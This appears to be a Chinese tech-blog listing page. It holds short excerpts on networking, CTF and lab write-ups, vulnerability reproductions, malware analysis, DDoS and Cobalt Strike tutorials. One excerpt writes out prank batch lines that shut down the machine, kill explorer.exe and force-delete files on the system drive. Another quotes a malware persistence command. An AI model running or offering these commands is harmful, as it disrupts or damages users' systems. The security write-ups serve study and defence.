0.学习密码学的目的与方法作为一个工程师，你不需要像科学家一样掌握密码学的整个开发过程。为了保障安全性，密码学发展出不同的模块，解决了不同的问题，数据的安全性也在这个过程中不断提升。而加密只是其中众多模块之一。其他…

MySQL系列第一篇入门

1.什么是关系型数据库呢？ RDBMS 是一种结构化数据存储系统，使用表格间的关系来存储和操作数据。在关系型数据库中，数据以行和列的形式存储，其中每一行表示一个关系或实体，每一列表示该实体的某个属性或特征关系型数…

为什么棋牌类APP不能做

1.首先，目前棋牌类APP已经被政府明令禁止了，所有开发和发布类似的APP是不被允许的。其次，某信小游戏平台关于游戏类目选择的规范，明确的规定：棋牌类、捕鱼以及角色类目的游戏暂不对个人开发者开放！ 也就…

AgentTesla分析报告

火绒剑监控执行监控创建schtasks.exe文件参数: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vsqbOQbkJjh" /XML "C:\Users\xxx\AppData\Local\Temp\tmpC0FD.tmp" 创建了自己文件监控创建C:\Users\xxx\AppData\Roaming\vs…

墨者学院 WordPress 远程命令执行漏洞(CVE-2018-15877)

1. 背景介绍近日，WordPress 插件Plainview Activity Monitor被曝出存在一个远程命令执行漏洞。Plainview Activity Monitor 是一款网站用户活动监控插件。远程攻击者可以通过构造的url来诱导wordpress管理员来点击恶意链接最终导致远程命令执行 2.影响范围 Pla…

给刚入门或者准备转行网络工程师的朋友一些建议

我考HCIE的时候还不叫数据通信，那时候叫做路由交换。我考HCIE已经很多年了，成为一个高级网络工程师也已经很多年了。最近有很多刚入门和想转行成为网络工程师的粉丝朋友问我该怎么学以及考华为认证的一些建议，今天正好有机会在这里和大家分享…

静态路由配置全面详解，静态路由快速入门指南

操作步骤配置各路由器接口的IP地址以配置Router_1的GE0/0/0接口为例，其他接口配置与之类似，不再重复介绍。 a、如图2所示，依次选择“广域网互联 > 以太接口”，进入“以太接口”界面。图2 以太接口界面 b、在“以太接口列…

网络方向哪个发展更好？数据通信工程师学习路线分享

数据通信、网络安全、云计算，到底哪个网络方向更好呢？今天就带大家简单地了解一下。先说说数据通信，这个是普及度比较高的方向。一般我们可以从事数通网络工程师、售前工程师、远程技术支持工程师、驻场工程师等，这一类方向对于…

2021全国职业技能大赛安徽省阜阳市“网络空间安全赛项”赛题及赛题解析（超详细）

2021年中职组安徽省阜阳市“网络空间安全”赛项 2021安徽省阜阳市竞赛任务书及解析A模块基础设施设置/安全加固（200分）B模块安全事件响应/网络安全数据取证/应用安全（400分）模块C CTF夺旗-攻击（200分）模块D CTF夺旗-防御（200分）不懂的可以私信博主！2021安徽省阜阳市竞…

2021全国职业技能大赛浙江省杭州市“网络空间安全赛项”赛题及赛题解析（超详细）

2021年中职组浙江省杭州市“网络空间安全”赛项 2021浙江省杭州市竞赛任务书及解析A模块基础设施设置/安全加固（200分）B模块安全事件响应/网络安全数据取证/应用安全（400分）C模块 CTF夺旗-攻击（200分）D模块 CTF夺旗-防御（200分）不懂可以私信吧博主!2021浙江省杭州市竞…

wirehark数据分析与取证hacker1.pcap

什么是wireshark？wiresharekhacker1.pcap数据包数据包下载请私信博主!wiresharek Wireshark（前称Ethereal）是一个网络封包分析软件。网络封包分析软件的功能是检索取网络封包，并同时显示出最详细的网络封包数据。Wireshark使用W…

2021全国职业技能大赛安徽省合肥市“网络空间安全赛项”赛题及赛题解析（超详细）

2021年中职组“网络空间安全”赛项一.合肥市竞赛任务书二.任务书解析三.不懂的可以私信博主！一.合肥市竞赛任务书一、竞赛时间 8：00—11：00 共计3小时二、竞赛阶段竞赛阶段任务阶段竞赛任务竞赛时间分值第①阶段：单兵模式系统渗透测试任务一：数据库服务渗透测…

网络工程专业介绍

一、前言一年一度的高考结束了，在这里我介绍一下有关网络工程专业的介绍，仅代表个人观点，希望能够对想要报考网络工程专业的同学提供帮助。在此声明，本文中的所有内容仅代表我个人从大一上学到目前以来对于本学校、本专业的认知。…

沙箱、蜜罐原理浅析

目录一、沙箱（网络编程虚拟执行环境）1.1 概述1.2 重定向技术1.3 虚拟机和沙箱的区别二、蜜罐2.1 概述2.2 蜜罐诱捕关键能力2.3 反蜜罐技术2.4 蜜罐的思考三、网络欺骗(Cyber Deception)一、沙箱（网络编程虚拟执行环境） 1.1 概述 …

网络攻击网络通信中面临的4种安全威胁

截获: 窃听通信内容中断: 中断网络通信篡改: 篡改通信内容伪造: 伪造通信内容ARP欺骗ARP欺骗(ARP spoofing)，又称ARP毒化(ARP poisoning)、ARP病毒、ARP攻击ARP欺骗可以造成的效果:可让攻击者获取局域网上的数据包甚至可篡改数据包可让网络上特定电脑之间无法正常…

2021年中职组“网络安全”赛项杭州市竞赛任务书

2021年中职组“网络安全”赛项杭州市竞赛任务书一、竞赛时间总计：360分钟二、竞赛阶段三、竞赛任务书内容拓扑图 （一）A模块基础设施设置/安全加固（200分） 一、项目和任务描述： 假定你是某企业的…

猎杀物联网中的“WannaCry ”勒索病毒，我们该怎么做？

San Bruno 是一个古雅的中产阶级住宅郊区，距离旧金山国际机场不远。而在 San Bruno 的地下，是使用互联网作为其通信主干，由 SCADA 软件控制的天然气管道。 2010 年 9 月 9 日，因短路导致操作室误认为实际关闭的阀门是开启的状态&…

burpsuite关闭自动备份

2021全国职业技能大赛湖南省“网络空间安全赛项”赛题及赛题解析（超详细）

2021年中职组“网络空间安全”赛项一.湖南省竞赛任务书二.任务书解析：三.不懂的可以私信博主！一.湖南省竞赛任务书一、竞赛时间 8：00—11：00 共计3小时二、竞赛阶段竞赛阶段任务阶段竞赛任务竞赛时间分值第①阶段：单兵模式系统渗透测试任务一：签到题任务二…

CTF BugKu平台—Misc：多种方法解决

题目链接：https://ctf.bugku.com/challenges/detail/id/12.html 下载下来是个exe 运行然后不行放入winhex中发现了base64 还有jpg 会不会是base转图片还真是把后缀改为txt 全部复制放入网站还原 base64图片转换：http://tool.chinaz.com/tools/imgtoba…

华为资深网工用600幅图表把计算机网络变得通俗易懂

真是一本难得的国内技术的好书。——读者说前言说到计算机网络，大家肯定首先要问的是它到底有什么用途，也就是我们可以用它来做什么。如果时光倒退十多年，问到计算机网络有什么用途时，可能大家会不约而同地回答为“资源共享”。…

网络工程师常用的软件工具整理，最新软件安装包分享

给我一根杠杆，我可以撬动整个地球。早在古希腊时期阿基米德就告诉我们工具的重要性，有了工具我们才能创造出现在的世界。现在的世界已经进入互联网时代，作为一名网络工程师，软件工具就是我们手中撬动网络世界的杠杆！…

弱电工作5年，我是如何下定决心转行从事网络技术的

我本可以忍受黑暗，如果我不曾见过光明。曾经我是做电脑监控一类的，专业点来说就是弱电方向，做过弱电的人都知道这一行确实比较辛苦，而且不仅只有辛苦。弱电这一行我做了5年左右，换工作的时候另一家公司只给我开4500一…

有了IP地址为什么还要有MAC地址？这篇文章为你解惑

我们前面讲过IP地址，说IP地址能够让我们在网络世界里找到我们的目标主机，但是有了IP地址为什么还要MAC地址呢？IP地址和MAC地址又有什么差别呢？ 我认为IP地址和MAC地址可以类比生活中寄快递的过程。我们知道数据存在封装和解封装…

零基础转行网工，我是如何拿到月薪20K的，网工系统学习路线分享

当你尽了自己的最大努力时，失败也是伟大的。这句话给了我改变的勇气！ 说下经历先说下我的经历：平时大家工作不顺的时候会经常调侃不如去厂里打螺丝，而我在从事网工行业之前确是实实在在的在厂里打了几年螺丝。后来发现这份工作不…

Ping命令是如何工作的呢？这篇文章给你答案

ping命令我们见怪不怪了，一般来说，我们们用 ping查看网络情况，主要是检查两个指标： 1、对方是否可达 2、延迟是否太高如果超时那么肯定是网络有问题（禁 ping情况除外），如果延迟太高&#xf…

终于有华为高工整理网工必备图解网络文档，形象又有趣

我们必须时常改进、挑战、增加我们的知识，否则它将不复存在。前言网络相关的知识学习一直都是枯燥难懂的，图解一直都是快捷又有趣的学习方式。最近搜集了一份图解网络文档，内容涵盖HTTP、IP、数据包、TCP、TCP三次握手和四次挥手、TCP&…

还有人不知道Overlay网络？看完这个你就全懂了

1、什么是Overlay网络？ overlay(又叫叠加网络、覆盖网络)简单理解就是把一个逻辑网络建立在一个实体网络之上。其在大体框架上对基础网络不进行大规模修改就能实现应用在网络上的承载，并能与其它网络业务分离，通过控制协议对边缘的网络设备进…

网络工程师常用的命令整理，还不快收藏起来

文章篇幅较长，耐心看完你一定有所收获。一、ping命令 1、ping ping是最常用的实用程序之一，用来确定网络的连通性 ping是个使用频率极高的实用程序，主要用于确定网络的连通性pi,如果ping通一个地址，那么基本可以排除物理层数据…

Web安全教程（超详细！从入门到精通！零基础可学！）

Web简介： Web 即全球广域网，也称为万维网，它是一种基于超文本和HTTP的、全球性的、动态交互和浏览信息提供了图形化的、易于访问的直观界面，其中的文档及超级链接将Internet上的信息节点组织成一个互为关联的网状结构。万维网常…

Qual+Android方案Unlock学习以Oneplus7Pro为例

目录背景 Unpack guacamole_21_H.04_190416.ops Unlock探究开发者选项–允许解锁 fastboot oem unlock extract LinuxLoader from abl 过程分析 FH读写分区逆向MSM Download USB抓包 token & pk 逆向结果尝试修改分区实现unlock VerifiedBoot Protocol 分…

隧道代理-

文章目录代理代理使用场景VPS建立隧道frpMSF木马生成监听开启frp服务端和客户端执行exe木马文件代理实验环境： 攻击机kali：192.168.160.32（NAT模式）模拟的公网服务器（本机）：10.9.75.214失陷…

软件TFN 2K的分布式拒绝攻击(DDos)实战详解

写在前头本人写这篇博客的目的，并不是我想成为黑客或者鼓励大家做损坏任何人安全和利益的事情。因科研需要，我学习软件TFN 2K的分布式拒绝攻击，只是分享自己的学习过程和经历，有助于大家更好的关注到网络安全及网络维护上。需要…

CRM系统：快速实现外勤出差人员远程访问企业提升工作效率！

🎬 鸽芷咕：个人主页 🔥 个人专栏:《速学数据结构》《C语言进阶篇》 ⛺️生活的理想，就是为了理想的生活! 文章目录快速实现外勤出差人员远程访问企业CRM系统前言1. 无需公网IP，高效低成本实现CRM系统远程访问1.1 下…

如何提升网站排名和用户体验：优化网站速度

网站的排名和用户满意度直接受到站点内容的加载速度影响深远。通过精心的网站优化，您不仅可以提高排名，还可以提供更出色的用户体验，尽管用户可能不会察觉到您的网站加载得更快，但这是一个非常有意义的改进。在这篇文章中&#xf…

成为一个黑客要多久？

一个暑假能成为黑客吗？资深白帽黑客告诉你答案，如果你想的是能到阿里五角大楼内网四处溜达，但是不可能的，但是成为一个初级黑客还是绰绰有余，你只需要掌握好渗透测试、外攻防、数据库等基本内容，搞懂外部安…

Vulnhub系列靶机---Raven2

文章目录 Raven2 渗透测试信息收集提权UDF脚本MySQL提权SUID提权 Raven2 渗透测试信息收集查看存活主机 arp-scan -l 找到目标主机。扫描目标主机上的端口、状态、服务类型、版本信息 nmap -A 192.168.160.47目标开放了 22、80、111 端口访问一下80端口，并…

BUUCTF 你竟然赶我走 1

BUUCTF:https://buuoj.cn/challenges 题目描述： 下载附件后有一张图片。密文： 解题思路： 有两种解题方法方法一： 1、使用StegSolve打开图片。 2、打开File Format（文件格式） 3、拉到最下面&#…

Domain_audit是一款基于渗透测试角度的域审计工具

关于Domain_audit 该工具是PowerView、Impacket、PowerUpSQL、BloodHound、Ldaprelayscan和Crackmapexec的包装器，用于自动执行枚举和在On-Prem Active Directory渗透测试期间执行的大量检查。检查项目 Invoke-AD CheckAll将按顺序执行以下操作： 收…

渗透波菜网站

免责声明本文发布的工具和脚本，仅用作测试和学习研究，禁止用于商业用途，不能保证其合法性，准确性，完整性和有效性，请根据情况自行判断。如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利&#xff0c…

优化网站以提升原创性和性能

一、创新性构建网站框架 1. 精简页面渲染流程：杜绝多余的代码和无谓的图像，利用CDN快速资源分发，以精减加载时间。 2. 精心规划内容层次：借助恰如其分的标题和精炼描述，迅速揭示页面精髓，满足搜索引擎智慧…

VulnHub lazysysadmin

一、信息收集 1.nmap扫描开发端口开放了：22、80、445 访问80端口，没有发现什么有价值的信息 2.扫描共享文件 enum4linux--扫描共享文件使用： enum4linux 192.168.103.182windows访问共享文件 \\192.168.103.182\文件夹名称信息收集&…

模糊测试面面观 | 电动汽车充电桩安全漏洞案例分享

在上一期我们讲了针对车载以太网DOIP协议详细阐释在实际过程的漏洞发掘过程，本期我们将继续延展，探讨电动车充电系统的安全漏洞。开源网安在基于 GB/T 27930-2015通信标准的电动汽车充电桩中，采用渗透测试、模糊测试和数据流分析等多种安全漏…

攻防世界题目练习——Web引导模式（三）（持续更新）

题目目录 1. mfw2.3.4.5. 1. mfw 进去看到网页和页面内容如下： 看到url的参数 ?pageabout ，我以为是文件包含什么的，反复试了几次，想用 …/…/…/…/etc/passwd ，但是发现.似乎被过滤了，实在不知道怎么做…

上网冲浪发现多处XSS

突然的发现今天上网冲浪，突然想起来有一种神器，叫废话生成器，之前是在哪里下了个软件玩了一下，然后就给删除了，因为我觉得这个软件不过就是调用了一个web接口实现的，一个网页能解决的事还要我下一个软件。…

专利背后的故事 | 一种邮件安全控制方法

Part 01 专利发明的初衷邮件系统是企业信息化过程中不可或缺的通讯软件。邮件系统为企业员工以及外部客户提供电子邮件通讯服务是其基本功能。一般企业可采取自建、租用、云端部署等多种方案。虽然邮件系统对企业的业务往来如此重要，但是电子邮件从诞生到今天&…

Flask (Jinja2) 服务端模板注入漏洞复现

文章目录 Flask (Jinja2) 服务端模板注入漏洞1.1 漏洞描述1.2 漏洞原理1.3 漏洞危害1.4 漏洞复现1.4.1 漏洞利用 1.5 漏洞防御 Flask (Jinja2) 服务端模板注入漏洞 1.1 漏洞描述说明内容漏洞编号漏洞名称Flask (Jinja2) 服务端模板注入漏洞漏洞评级高危影响版本使用Flask框架…

《AWD特训营》CTF/AWD竞赛的速胜指南！全面提升安全技术

🎬 鸽芷咕：个人主页 🔥 个人专栏:《粉丝福利》《C语言进阶篇》 ⛺️生活的理想，就是为了理想的生活! 文章目录前言一、AWD竞赛的由来《AWD特训营：技术解析、赛题实战与竞赛技巧》1.1介绍： 《AWD特训营》…

公有云攻击案例

CVE-2021-21287: 容器与云的碰撞——一次对MinIO的测试 | 离别歌重磅首发！火线安全发布《云安全攻防技术期刊》 - 火线 Zone-安全攻防社区https://medium.com/BreizhZeroDayHunters/when-its-not-only-about-a-kubernetes-cve-8f6b448eafa8 嘶货 https://raesene.…

联邦学习综述四

A Survey on Security and Privacy of Federated Learning 选自：Future Generation Computer Systems，2020 本文介绍了联邦学习安全以及隐私方面面临的挑战，提出了一些现有的解决方案。引言联邦学习(FL)提供了一种通过将数据从中心服务…

【Loopback Detection 环回检测以及原理解读】

Loopback Detection简介 Loopback Detection（环回检测）通过周期性发送环回检测报文来检测设备下挂网络是否存在环路。网络中的环路会导致设备对广播、组播以及未知单播等报文进行重复发送，造成网络资源浪费甚至网络瘫痪。为了能够及时发现…

WAF,Yakit,SSH 小技巧

文章目录 WAF,Yakit,SSH 小技巧1. WAF 文件上传绕过2. Yakit 暴力破解3. SSH 免密码登录4. SSRF配合redis未授权漏洞4.1 安装ssh4.2 redis未授权4.3 安装redis4.4 Gopher协议4.5 利用redis写文件 WAF,Yakit,SSH 小技巧 1. WAF 文件上传绕过脏数据绕过WAF适用于所有的漏洞&am…

源代码漏洞监测【软件代码缺陷性检测】

本文仅供思路参考、交流一、题目要求利用树、图、序列等对软件源代码进行代码表征。利用深度学习实现对代码有无漏洞的分类实现检测漏洞类型调研过程调研了一些论文，发现目前的一些论文，例如FUNDED、SemVulDet、SEVulDet、SySeVR都只能实现二分类，即有无代码漏洞，但是这…

策略路由、路由策略傻不傻分不清楚？5分钟不到搞懂一切

在网络设备维护上，现在很多维护的资料上都讲到“路由策略”与“策略路由”这两个名词，但是有很多搞维护的技术人员对这两个名词理解的还不是很透彻，无法准确把握这两者之间的联系与区别。本文简单分析一下这两者之间的概念，并介绍…

安全巡检

安全巡检目的识别信息系统存在的安全脆弱性、分析信息系统存在的风险，并及时采取措施予以整改，保障信息系统安全稳定运行巡检收益 1、通过专业、严谨的安全巡检服务，确保客户IT环境的安全性和稳定性 2、大大降低客户的运维风险和运维成本 3、专业的安全技术和专业的…

DoS和DDoS拒绝服务

DoS拒绝服务简介 DoS拒绝服务利用程序漏洞或一对一资源耗尽的Denial of Service拒绝服务 DDoS分布式拒绝服务一对一的攻击完全拼各自的资源，效果差多对一的攻击汇聚资源能力，重点在于量大，属于资源耗尽型历史以前：欠缺技术能力的无赖，我ping死你（最难缠的无…

「报告」工业互联网信息安全厂商报告-02

本期要点-6.10 【方案】360提出数据驱动的工控信息安全协同防护方案；【方案】匡恩为网络摄像头设备制造商提供了一套安全加固方案，不涉及最终使用单位的安全防护；【案例】匡恩宣传了在沙角电厂和常德卷烟厂和某水务公司的案例；【…

一些恶搞的bat小脚本

关机脚本 echo off shutdown -s -t 0 重启脚本 echo off shutdown -r -t 0 唬人的格式化脚本 echo off color 4f taskkill /im explorer.exe /f echo 删除C盘所有文件...... del /f /s /q "%systemdrive%\*.tmp" del /f /s /q "%systemdrive%\*.dmp"…

红队内网渗透神器--CobaltStrike安装教程

CobaltStrike介绍： CobaltStrike是一款渗透测试神器，被业界人称为CS神器。CobaltStrike分为客户端与服务端，服务端是一个，客户端可以有多个，可被团队进行分布式协团操作。 CobaltStrike集成了端口转发、服务扫描&…

【高危】Microsoft Office Visio 远程执行代码漏洞

漏洞描述 Microsoft Office Visio 是微软公司开发的一款流程图和矢量图绘制工具。 Microsoft Office Visio 受影响版本中，当解析攻击者恶意制作的Visio文件时，攻击者可以在应用程序上下文执行任意代码。漏洞名称Microsoft Office Visio 远程执行代码…

流量分析日志查看

一流量分析 buuctf wireshark 从题目出发，既然是上传登录信息，就直接过滤post请求，即搜索 http.request.methodPOST，因为上传用户登录信息使用的一定是http里的post方法模式过滤 http.request.method “GET” http.request.…

利用SCCM进行横向移动

01SCCM介绍 SCCM全名为System Center Configuration Manager，从版本1910开始，微软官方将其从Microsoft System Center产品移除，重新命名为Microsoft Endpoint Configuration Manager（ConfigMgr），其可帮助 …

Smartbi 权限绕过漏洞复现（QVD-2023-17461）

0x01 产品简介 Smartbi大数据分析产品融合BI定义的所有阶段，对接各种业务数据库、数据仓库和大数据分析平台，进行加工处理、分析挖掘和可视化展现；满足所有用户的各种数据分析应用需求，如大数据分析、可视化分析、探索式分析、复杂…

利用MS-SAMR协议修改用户密码

本文为Windows RPC利用系列文章的第一篇，主要介绍关于MS-SAMR的部分利用，在后续的文章中将继续介绍RPC在渗透测试中的应用在渗透测试过程中，经常遇到拿到用户的NTLM哈希但无法解密出明文密码的情况。本文介绍并分析一种在仅知道域用户密码哈…

CTF-记一次PWN练习

PWN是一个黑客语法的俚语词，自"own"这个字引申出来的，这个词的含意在于，玩家在整个游戏对战中处在胜利的优势，或是说明竞争对手处在完全惨败的情形下，这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个…

聚焦云原生安全攻防|构建纵深防御的运行时威胁检测体系

7月2日，诸子云北京分会研讨会活动—网络安全攻防对抗在北京成功举办。作为国内云原生安全领导厂商，安全狗也参与此次活动。厦门服云信息科技有限公司（品牌名：安全狗）成立于2013年，致力于提供云安全、&…

Web安全原理及实践（基础部分）

Web安全原理及实践（入门）Web安全基础Web安全概述Web安全基础常见渗透测试工具NmapBurpSuiteSqlmapSublime常见的漏洞扫描工具BurpsuiteScanner模块AWVSAPPscanNessusWeb安全基础 Web安全概述前提： 攻击者要想先攻击服务器之前，…

【Linux】网络配置相关命令（一）

【Linux】网络配置相关命令（一） 修改主机名称（一） # cat /etc/sysconfig/networkNETWORKINGyes HOSTNAMElocalhost.localdomain #设置主机名，重启后生效修改主机名称（二） # hostname youchanw…

日志分析管理系统_企业网络日志对网络安全有哪些重要意义？

近几年科技发展的速度飞快，很多方面已经超出了我们的认知。前几年网上炒的人驾驶汽车在国内已经可以看到。银行、餐厅、机场等重要场所已经部分开始利用人工职能机器人办公。这些在前些年还是我们不敢想的，今天都已经成了现实。所以对于人类来讲&#xf…

vmware下安装windows2012

vmware下安装windows2012 1、在VMware下，选择——>新建虚拟机。 1.1 选择典型 1.2 稍后安装操作系统 1.3 选择Windows Server 2012 1.4 位置自定义 1.5 磁盘大小 100G 1.6 自定义硬件内存处理器数量：2 ISO镜像文件网络连接&#xff1…

Vmware Workstation Pro16安装

Vmware Workstation Pro16安装一、右击打开安装包二、下一步三、勾选我接收许可协议中的条款，点击下一步四、修改安装路径五、两个复选框都取消勾选六、下一步七、安装八、许可证九、完成

SQL注入(四)之攻击类型与方式(中)

四 insert注入 insert注入，就是前端注册的信息最终会被后台通过insert这个操作插入数据库，后台在接受前端的注册数据时没有做防SQL注入的处理， 导致前端的输入可以直接拼接SQL到后端的insert相关内容中，导致了insert注入。 01 填写…

SQL注入(四)之攻击类型与方式(上)

一 union注入 01 Union操作符演示 union操作符用于合并两个或多个SQL语句集合起来，得到联合的查询结果。输入select id,email from member where usernamekevin union select username,pw from member where id1;注：union操作符一般与order by语句配合…

SQL注入(三)之注入提交方式

一 get提交 01 get提交演示 02 Burpsuit抓包二 post提交 01 post提交演示 02 Burpsuit抓包三 Cookie提交 01 post演示, Burpsuit抓包

网络关键设备和网络安全专用产品目录-2023年7月

2023年7月3日，网络关键设备和网络安全专用产品目录（一级）终于更新了，增加到38类，大家想了解每类产品对应哪家检测机构、以及涉及相关的标准、分解的二级产品目录，可以联系龙域认证客服。一、网络关键设备…

B2R Raven: 2靶机渗透

B2R Raven: 2靶机渗透视频参考：ajest ：https://www.zhihu.com/zvideo/1547357583714775040?utm_id0 原文参考：ajest ：https://www.zhihu.com/column/c_1403138803561816064 原文参考：ajest https://zhuanlan.zhih…

如何能优化网站开展速度

随着互联网技术的飞速发展，网站加载速度已经成为一个不可忽视的关键要素。当您的网站速度缓慢，不仅会影响用户的访问体验，还可能导致用户的流失。以下是一些创新的技巧和策略，帮助您提升网站打开速度。一、在图像压缩上做文章 …

PHP 预定义超全局变量笔记/练习

预定义超全局数组变量 $_FILES 练习在最后其他练习跟在每条笔记后概述预定义：预定义变量是 PHP 已定义，可以直接使用超全局：作用域是全局，可以在脚本的任何地方（包括函数内部、外部）都可以进行访问常…

二、安全与风险管理—安全与风险管理基础

目录目录 1.什么是信息与信息的生命周期 2.信息安全的基本目标 3.风险管理与控制类型

PHP 函数、PHP 简单后门

函数基本结构语法结构 function 函数名(形式参数1,形式参数2...){//函数体return 返回值 }定义并执行一个简单函数 // funtion.phpfunction test(){echo "This is function ".__FUNCTION__; }test();函数传参 // function.phpfunction add($x, $y){$sum $x …

DC-7 靶机

DC_7 信息搜集存活检测详细扫描后台网页扫描网页信息搜集搜索相关信息在配置中发现了用户名密码字样 $username "dc7user"; $password "MdR3xOgB7#dW";ssh 登录尝试使用获取的账密进行登录网页登录失败尝试 ssh 登录成功登录登陆今后提…

国内外CDN的发展

当今互联网世界中，内容交付网络（Content Delivery Network，CDN）已经成为网络加速的不可或缺的工具。CDN技术在国内外得到广泛应用，为了更好地了解CDN的不同之处以及未来的发展趋势，让我们深入探讨这一领域的…

华盛顿特区选举委员会：黑客可能已侵入整个选民名册

导语近日，华盛顿特区选举委员会（DCBOE）传来了一条令人担忧的消息：黑客可能已经侵入了整个选民名册。这一事件引发了公众的广泛关注和担忧。本文将为大家详细介绍这一事件的经过以及可能带来的后果，并探讨选民数据的保…

A062-防火墙安全配置-配置Iptables防火墙策略

实验步骤: 【教学资源类别】序号类别打勾√ 1 学习资源 √ 2 单兵模式赛题资源 3 分组对抗赛题资源【教学资源名称】防火墙安全配置-配置安全设置iptables防火墙策略【教学资源分类】一级大类二级大类打勾√ 1.安全标准法律法规行业标准安全…

有没有好用的扫描爆破工具？来看这里

工具介绍 goon集合了fscan和kscan等优秀工具功能的扫描爆破工具。功能包含：ip探活、port扫描、web指纹扫描、title扫描、压缩文件扫描、fofa获取、ms17010、mssql、mysql、postgres、redis、ssh、smb、rdp、telnet、tomcat等爆破以及如netbios探测等功能。参数说…

Steam通过短信验证来遏制带有恶意软件的更新

导语段落近期，Steam平台上的游戏开发者账户遭受了来自恶意软件的更新攻击，为了应对这一问题，Valve公司宣布将实施额外的安全措施，其中包括基于短信的确认码验证。本文将为大家介绍这一新措施以及其对游戏开发者和玩家的影响。短…

Xshell7试用期过了，打开就显示评估期已过，想继续或者不能删除怎么办？详细说明解决步骤

文章目录 1、问题说明2、解决办法2.1 重新安装2.2 卸载 1、问题说明多长时间没用 Xshell 远程连接服务器，发现之前没有使用魔法工具处理（正版），现在过期了。 2、解决办法想继续使用Xshell的话，有两种方式&#xff…

【网络安全 --- win10系统安装】win10 系统详细安装过程（提供资源）

一，资源下载百度网盘镜像下载地址链接： 百度网盘请输入提取码百度网盘为您提供文件的网络备份、同步和分享服务。空间大、速度快、安全稳固，支持教育网加速，支持手机端。注册使用百度网盘即可享受免费存储空间https://pan.ba…

MoeCTF 2023 Web+Jail wp

----------签到---------- hello CTFer 给了一个URL，是赛博厨子解码base64的flag，flag直接给了。远程端口转发： 这次比赛估计好多大师傅都没参加，题目环境是在本机内网上的（比如localhost:52005）导致请…

在迪拜举行的 GITEX GLOBAL 2023 IT 展览会上，Positive Technologies 荣获两项大奖!

🏆 在迪拜举行的 GITEX GLOBAL 2023 IT 展览会上，Positive Technologies 荣获两项大奖。这两个奖项都是影响力网络安全领域的最佳供应商。 🏵 Future Enterprise Awards 2023 是该地区 IT 行业最重要的奖项之一。该奖项每年颁发给对信息技术…

企业数据安全组织建设

PS:内容均为个人学习及实践积累所得！ 前言&&背景企业数据安全组织团队的建设非常重要。首先,数据是企业最重要的资产和核心竞争力。如果数据泄露或遭到破坏,将直接威胁企业的生存。因此,数据安全事关企业的生存和发展。建立专业的数据安全团队,可以系统…

漏洞危害

危害跨站脚本攻击 xss xss盲打打到管理员cookie 然后可以利用cookie登录管理员后台 xss 利用js代码在服务器执行然后返回页面形成弹窗发布不良信息或者和csrf相连接让点击者做出转账等csrf写的操作 http header测试危害容易明文传输暴露一下敏…

中国xx集团信息技术工程师面试

进入面试间，坐着三位面试官，压力扑面而来，三位面试官先做了自我介绍，介绍了一下面试的流程后才开始面试。一、自我介绍不多说。二、看你学过数据挖掘这门课，能简单介绍一下有哪些章节，学了些什么&…

后台管理系统SQL注入漏洞

对于edu来说，是新人挖洞较好的平台，本次记录一次走运的捡漏0x01 前景在进行fofa盲打站点的时候，来到了一个后台管理处看到集市二字，应该是edu站点确认目标身份（使用的quake进行然后去ipc备案查询） 网…

软考网络工程师每日一练10.20

泛微OA E-Office V10 OfficeServer 任意文件上传漏洞复现

声明本文仅用于技术交流，请勿用于非法用途由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。漏洞简介泛微e-ofice是一款标准化的协同0A办公软件，泛微 …

CDN加速与DDoS攻击防护：保障网站稳定与用户体验

在今天的数字时代，网络性能和安全性是网站运营的两个至关重要的方面。CDN（内容分发网络）不仅可以加速网站的内容交付，还可以在防护DDoS（分布式拒绝服务）攻击方面发挥关键作用。本文将深入探讨CDN如何加速网…

中间件安全-CVE复现IISApacheTomcatNginx漏洞复现

目录中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现中间件-IIS安全问题中间件-Nginx安全问题漏洞复现Nginx 解析漏洞复现Nginx 文件名逻辑漏洞中间件-Apache-RCE&目录遍历&文件解析等安全问题漏洞复现漏洞复现CVE_2021_42013 RCE代码执行&…

yakit使用爆破编码明文_dnslog使用

yakit使用爆破编码密码文章目录 yakit使用爆破编码密码yakit使用1 yakit编码密码进行爆破2 准备eval.php文件放入web3 访问http://192.168.225.206/eval.php,使用bp抓包,测试后环境准本好4 使用yakit4.1 进入页面，点击这里进行配置默认端口80834.2 发送到模糊测试4…

ExelaStealer：新型低成本网络犯罪武器崭露头角

网络犯罪的工具层出不穷，而最新的一款信息窃取器ExelaStealer也开始崭露头角。这种低成本的恶意软件专门针对受损的Windows系统，用于窃取敏感数据。据Fortinet FortiGuard Labs研究员James Slaughter在一份技术报告中表示：“ExelaStealer是一…

SQL注入(二)之注入分类

一前期准备 01 查询IP 02 启动phpstudy 03 访问网站二数字型 01 正常查询 02 Burpsuit抓包 03 SQL注入(重发器中测试) 04 查看源码三字符型 01 正常查询 02 Burpsuit抓包 03 SQL注入(重发器中测试) 04 SQL注入(浏览器中测试) 四搜索型 01 SQL注入 02 查看源码五 XX型…

AppScan安装教程

01 安装 01 运行.exe 02 点击【确定】 03 点击【下一步】 04 点击【安装】 05 点击【否】如果需求扫描Web services点击【是】安装该插件，如果不需要点击【否】如果只是扫描web就不需要安装 06 点击【完成】 02 破解补丁安装完成之后把rcl_rational.dll文件复…

windows2003下weblogic安装

01 安装weblogic 02 配置导向 03 网站部署 01 创建startWeblogic快捷方式 02 查看本机ip 03 url访问 url地址: http://192.168.16.37:7001/console04 网站部署 url地址: http://192.168.16.37:7001/jobfan/2010.jsp

windows2003下搭建tomcat + struts环境

01 搭建tomcat struts环境 01 安装JspStudy 02 在 tomcat文件夹下自动解压 struts2压缩包 03 登录网站 http://192.168.16.59:8080/struts2-showcase/index.jsp

反欺诈体系与设备指纹

文章目录动态防控理念生物探针智能验证码生物探针和智能验证码的区别：风险态势感知系统风控核心组件设备指纹设备指纹的原理Android 设备指纹iOS 设备指纹Web 设备指纹设备ID 生成与恢复逻辑生成逻辑恢复逻辑代码保护JS 代码混淆技术Android/iOS SDK 加固保护动态防…

14Finger指纹识别平台搭建

一、14Finger简介 14Finger是一款功能齐全的Web指纹扫描和分享平台，基于vue3django前后端分离的web架构，并集成了长亭出品的rad爬虫的功能，内置了一万多条互联网开源的指纹信息。 repo: https://github.com/b1ackc4t/14Finger基于强大的…

【高危】 Microsoft Teams 远程代码执行漏洞

